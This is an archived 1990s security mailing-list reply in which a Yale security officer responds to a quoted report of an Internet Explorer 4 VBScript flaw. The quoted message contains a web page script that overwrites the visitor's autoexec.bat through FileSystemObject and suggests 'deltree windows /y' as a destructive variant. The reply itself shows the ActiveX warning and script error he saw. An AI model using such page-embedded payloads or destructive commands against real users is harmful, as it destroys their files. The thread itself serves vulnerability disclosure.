Pink Panther <franckp @
hebdomag .
com> allegedly wrote:
>Sorry to be out of topic but...
This is really a topic more for ntbugtraq or ntsecurity.
I've added those lists to the To: line of this message.
You must have a less secure setting for the 'Local intranet zone' than
I because I get a popup when I run MS IE 4 ( 4.72.2106.8 128 bit)
on my Windows NT 4.0 notebook PC and load your HTML file from a web server:
+-------------------------------------------------------------------------+
|Security Alert |X|
+-------------------------------------------------------------------------+
| |
| [image of] An ActiveX object on this page may be unsafe. Do you |
| [lock&key] want to allow it to initialize and be accessed by scripts?|
| |
| [Yes] [No] |
+-------------------------------------------------------------------------+
When I click on the 'No' button I get the popup :
+-------------------------------------------------------------------------+
|Internet Explorer Script Error |?|X|
+-------------------------------------------------------------------------+
| |
| [image of] An error has occurred in the script on this page. |
| [ ! ] |
| |
| Line: 8 |
| Char: 1 |
| Error: ActiveX component can't create object: 'CreateObject' |
| Code: 0 |
| |
| |
| Do you want to continue running scripts on this page? |
| [Yes] [No] |
+-------------------------------------------------------------------------+
>For those who are using Internet Explorer 4.0 YACK!
>
>If you put that little script in a web page, you can modify all the files
>you want and make a big crash!
>
>This script works with VBScript 3.x engines...
>
><HTML>
><HEAD>
></HEAD>
><BODY>
><SCRIPT LANGUAGE="VBSCRIPT">
>
>
>Set fs = CreateObject("Scripting.FileSystemObject")
>Set a = fs.CreateTextFile("c:\autoexec.bat", True)
>a.WriteLine("@echo off")
>a.WriteLine("echo This is a test.")
>a.WriteLine("pause")
>a.WriteLine("@echo on")
>a.Close
>
></SCRIPT>
>
></BODY>
></HTML>
>
>
>Good Bye!
>
></BODY>
></HTML>
>
>
>This will replace the autoexec.bat of the client with the content of
>"a.writeLine"...
>
>Imagine with "deltree windows /y"
>
>If you plan to try this script, BACKUP YOUR AUTOEXEC.BAT!!!
>
>That's ALLLLLLLLLLLLLLLLLLLLL!
>
>/***Pink Panther The Big pink minou!***/
H. Morrow Long, Yale Univ IT ISO -Info Technology Services Info Security Officer
175 Whitney Avenue, New Haven, CT 06520-8276, (203)432-1248(voice) 432-0593(FAX)
INET: http://pantheon.yale.edu/~long/ mailto:Morrow .
Long @
yale .
edu
PAGE: (203)370-3081, (800)347-2574, mailto:1165469 @
pager .
mcb .
com PIN# 1165469
PGP 1024/54F9FD69 1997/08/25 fp 97 ED E7 9D 41 8A 90 8C 4D 7C 22 56 80 BA 84 09
|
|
